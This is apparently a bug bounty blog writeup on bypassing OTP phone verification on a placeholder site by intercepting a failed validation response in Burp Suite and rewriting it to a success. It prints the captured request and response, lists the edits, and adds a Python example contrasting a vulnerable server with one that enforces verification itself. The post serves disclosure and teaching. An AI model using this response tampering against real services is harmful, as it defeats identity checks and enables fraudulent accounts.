OTP Bypass via Response Manipulation

Bharath Kalyan
4 min read · Feb 3, 2023


Hey hackers…

whoami? G Bharath Kalyan, Security Researcher, Bug Bounty Hunter from Chennai, India.

This is my second bug bounty writeup. If you missed my first writeup, read this.

Today I am going to talk about one of my findings, an OTP Bypass via Response Manipulation.

DESCRIPTION:

One of the ways to bypass OTP verification is by manipulating the response to a request. Enter your credentials, submit a fake OTP code and capture the request. Then intercept the response and change the status code to 200, or flip a boolean from false to true.

Let’s dig in!

I found this bug in a VDP.

First of all, let's assume that the website is www.target.com.

1) Sign up for an account on www.target.com

(screenshot: signup page)

2) Enter the email and password and click on signup.

3) A verification mail is sent to the given mail address. Verify the account.

4) You will see the name and country fields. Enter the name and country and click on next.

5) You will see the phone number field.

6) Enter the phone number and click on send OTP.

7) Enter a wrong OTP, click on verify, and capture the request in Burp Suite.

8) The request looks like this:

POST /kyc/v1/provider/OTP/validate HTTP/2
Host: api.target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target.com/
Content-Type: application/json
Authorization: Bearer
Content-Length: 51
Origin: https://target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"otpCode":"000000","mobileNumber":"your number"}

9) The response looks like this:

HTTP/2 400 Bad Request
Date: Fri, 03 Feb 2023 06:49:27 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 65
X-Amzn-Requestid: d7945153-47ab-4a62-8516-4aad0858ead3
X-Dns-Prefetch-Control: off
Referrer-Policy: no-referrer
X-Permitted-Cross-Domain-Policies: none
X-Xss-Protection: 0
Access-Control-Allow-Origin: *
Expect-Ct: max-age=0
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Amzn-Remapped-Content-Length: 65
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
X-Amzn-Remapped-Connection: keep-alive
X-Download-Options: noopen
X-Amz-Apigw-Id: fwAymFoFBcwFsfQ=
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Etag: W/"41-+wRLn6C1eL5LT718HJ9jGNCrZvA"
X-Amzn-Remapped-Date: Fri, 03 Feb 2023 06:49:27 GMT

{"to":"your number","status":"pending","message":"Invalid Otp"}

10) Change the above response as follows:

400 Bad Request >>> 200 OK

"status":"pending" >>> "status":"success"

"message":"Invalid Otp" >>> "message":"Valid Otp"

11) The OTP is bypassed successfully and the account is created.

There is no indication of a correct OTP in the application; the application directly logs into the account, so I didn't attach a photo.


Researchers always try to brute-force the OTP field but forget to analyze the response sent to the browser. Play with response manipulation: sometimes the application acts on the response alone, and the server never enforces the result of the check on the next step.
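To make the root cause of steps 7 to 11 concrete, here is an added example (my illustration, not the target's code): a tiny in-memory stand-in for the OTP validate and signup-completion endpoints, driven by a client that rewrites the validate response exactly as in step 10. The class and function names (OtpServer, validate_otp, complete_signup, tampered_flow, honest_flow) are assumed for illustration; the vulnerable variant lets the rewritten response through because the server never checks its own verification state, while the hardened variant records success only on a correct OTP and refuses the next step otherwise.

```python
import hmac
import secrets

class OtpServer:
    """Minimal in-memory stand-in for the API; state is keyed by mobile number."""

    def __init__(self, enforce_server_side: bool):
        self.enforce = enforce_server_side
        self.sent = {}         # number -> OTP that was issued
        self.verified = set()  # numbers proven by a correct OTP

    def send_otp(self, number: str) -> str:
        # 000001..999999, so the wrong guess "000000" below is never a lucky hit
        code = f"{secrets.randbelow(10**6 - 1) + 1:06d}"
        self.sent[number] = code
        return code            # would be delivered by SMS in the real flow

    def validate_otp(self, number: str, code: str) -> tuple:
        expected = self.sent.get(number, "")
        if expected and hmac.compare_digest(expected, code):
            self.verified.add(number)   # the only path that records success
            return 200, {"to": number, "status": "success", "message": "Valid Otp"}
        return 400, {"to": number, "status": "pending", "message": "Invalid Otp"}

    def complete_signup(self, number: str) -> tuple:
        # Vulnerable variant (enforce=False): assumes the client only gets here
        # after a successful validate response and never checks its own state.
        if self.enforce and number not in self.verified:
            return 403, {"message": "phone number not verified"}
        return 201, {"message": "account created"}


def tampered_flow(server: OtpServer, number: str) -> int:
    """Steps 7 to 11 with an intercepting proxy: wrong OTP, response rewritten
    to 200/success, then the client moves on as if verification had passed."""
    server.send_otp(number)
    status, body = server.validate_otp(number, "000000")
    if status == 400:   # step 10: 400 >>> 200, pending >>> success
        status, body = 200, {**body, "status": "success", "message": "Valid Otp"}
    if body["status"] == "success":  # the client trusts the (rewritten) body
        status, _ = server.complete_signup(number)
    return status


def honest_flow(server: OtpServer, number: str) -> int:
    """The legitimate user submits the OTP that was actually issued."""
    code = server.send_otp(number)
    server.validate_otp(number, code)
    return server.complete_signup(number)[0]
```

With enforce_server_side=False the tampered flow ends in 201 (account created), which is the bug in this writeup; with it set to True the same tampering ends in 403 while the honest flow still gets 201.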

Disclaimer

The Blog Content has been made available for informational and educational purposes only.

I hereby disclaim any and all liability to any party for any direct, indirect, implied, punitive, special, incidental or other consequential damages arising directly or indirectly from any use of the Blog Content; readers are solely responsible for any such use.

Connect with me: LinkedIn, Twitter

Thanks for Reading :)

Happy hacking :)😊❤️
